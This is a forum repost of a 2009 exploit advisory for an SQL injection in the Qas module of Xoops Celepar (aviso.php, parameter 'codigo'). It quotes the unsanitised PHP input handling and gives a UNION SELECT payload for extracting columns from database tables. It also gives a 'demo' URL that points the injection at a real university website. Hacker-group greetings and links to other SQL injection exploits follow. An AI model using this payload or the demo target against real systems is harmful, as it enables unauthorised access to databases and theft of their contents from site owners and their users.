- Code:
**********************************************************************************************************
Xoops Celepar Module Qas
Donwload of Xoops Celepar : http://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz
Author: s4r4d0
mail:s4r4d0@yahoo.com
**********************************************************************************************************
A Sql Injection has been found on modules Quas of Xoops Celepar in file Aviso.php .
Source code:
}
$codigo = $_POST['codigo'];
} else
$codigo = $_GET['codigo'];
***********************************************************************************************************
Target: site.com.br/modules/qas/aviso.php?codigo=
Sql Code :-1+UNION+SELECT+1,2,columnname,4,5,6,7,8+from+tablename
Demo: http://www.dce.uem.br/modules/qas/aviso.php?codigo=-1+UNION+SELECT+1,2,3,4,5,6,7,8--
***********************************************************************************************************
[ Fatal Error Group Br ]
[Greetz: to Elemento_pcx - m4v3rick - w4nt3d - DD3str0yer - M0nt3r - Vympel]
[From Brazil]
************************************************************************************************************
# milw0rm.com [2009-07-24]
Xoops Celepar Module Qas (codigo) SQL Injection Vulnerability
Foxi- Admin
- Posts : 92
Reputation : -1
Join date : 2009-07-08
» E-Xoopport 3.1 Module MyAnnonces (lid) SQL Injection Vulnerability
» WebLeague 2.2.0 (profile.php) SQL Injection Vulnerability
» PHP Live! <= 3.2.2 (questid) Remote SQL Injection Vulnerability
» AnotherPHPBook (APB) v.1.3.0 (Auth Bypass) SQL Injection Vulnerability
» VS PANEL 7.5.5 (results.php Cat_ID) SQL Injection Vulnerability
» WebLeague 2.2.0 (profile.php) SQL Injection Vulnerability
» PHP Live! <= 3.2.2 (questid) Remote SQL Injection Vulnerability
» AnotherPHPBook (APB) v.1.3.0 (Auth Bypass) SQL Injection Vulnerability
» VS PANEL 7.5.5 (results.php Cat_ID) SQL Injection Vulnerability